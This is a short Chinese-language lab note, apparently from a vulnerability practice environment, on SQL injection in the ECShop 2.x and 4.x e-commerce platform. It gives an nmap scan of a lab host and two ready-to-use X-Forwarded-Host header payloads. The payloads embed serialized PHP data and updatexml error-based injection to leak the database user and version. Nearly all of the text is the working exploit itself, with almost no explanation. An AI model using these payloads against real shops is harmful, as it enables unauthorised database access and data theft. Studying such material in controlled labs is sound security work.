(ecshop2.x SQL注入)(ecshop4.x SQL注入)

ecshop2.x存在SQL注入漏洞

信息收集：nmap 192.168.85.130 -p 8080 -A

ecshop 4.x `collection_list` SQL 注入

信息收集：nmap 192.168.85.130 -p 8080 -A

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:”user_id”;s:38:”0′-(updatexml(1,repeat(user(),2),1))-‘”;s:7:”payment”;s:1:”4″;}|45ea207d7a2b68c49582d2d22adf953a

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:47:”1′ and updatexml(1,repeat(version(),2),1) and ‘”;|